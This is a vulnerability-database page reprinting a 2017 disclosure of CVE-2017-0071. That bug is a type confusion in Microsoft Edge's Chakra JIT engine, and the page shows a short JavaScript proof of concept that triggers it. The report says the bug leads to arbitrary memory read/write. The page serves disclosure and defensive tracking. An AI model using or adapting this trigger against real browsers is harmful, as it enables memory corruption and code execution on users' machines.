Vulners
Lucene search
Microsoft Edge Charkra Incorrect Jit Optimization Exploit
| Reporter | Title | Published | Views | Family All 52 |
|---|---|---|---|---|
 | Microsoft Edge browser vulnerability, allowing a hacker to execute arbitrary code | 31 Mar 201700:00 | – | bdu_fstec |
 | Microsoft Edge Scripting Engine Memory Corruption Vulnerability (CNVD-2017-03370) | 16 Mar 201700:00 | – | cnvd |
 | Microsoft Edge Scripting Engine Memory Corruption (MS17-007: CVE-2017-0071; CVE-2017-8548) | 14 Mar 201700:00 | – | checkpoint_advisories |
 | CVE-2017-0067 | 17 Mar 201700:00 | – | cve |
| CVE-2017-0071 | 17 Mar 201700:00 | – | cve |
 | CVE-2017-0071 | 17 Mar 201700:00 | – | cvelist |
 | July 11, 2017—KB4025338 (OS Build 10240.17488) | 11 Jul 201707:00 | – | mskb |
| July 11, 2017—KB4025339 (OS Build 14393.1480) | 11 Jul 201707:00 | – | mskb |
| July 11, 2017—KB4025342 (OS Build 15063.483) | 11 Jul 201707:00 | – | mskb |
| July 11, 2017—KB4025344 (OS Build 10586.1007) | 11 Jul 201707:00 | – | mskb |
10
Microsoft Edge: Chakra incorrect jit optimization with TypedArray setter.
CVE-2017-0071
PoC:
"use strict";
function func(a, b, c) {
a[0] = 1.2;
b[0] = c; <<<<----------------------- (1)
a[1] = 2.2;
a[0] = 2.3023e-320;
}
function main() {
var a = [1.1, 2.2];
var b = new Uint32Array(100);
// force to optimize
for (var i = 0; i < 0x10000; i++)
func(a, b, i);
func(a, b, {valueOf: () => {
a[0] = {}; <<<<----------------------- (2)
return 0;
}});
a[0].toString();
}
main();
In the above code, Chakra assumes that the type of |a| will be still a native float array after executing (1), even we could change its type with the valueOf handler( (2) ). So it could result in type confusion.
The attached PoC will reproduce arbitrary memory read/write.
Tested on Microsoft Edge 38.14393.0.0.
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
Found by: lokihardt
# 0day.today [2018-04-09] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Mar 2017 00:00Current
7.7High risk
Vulners AI Score7.7
EPSS0.26145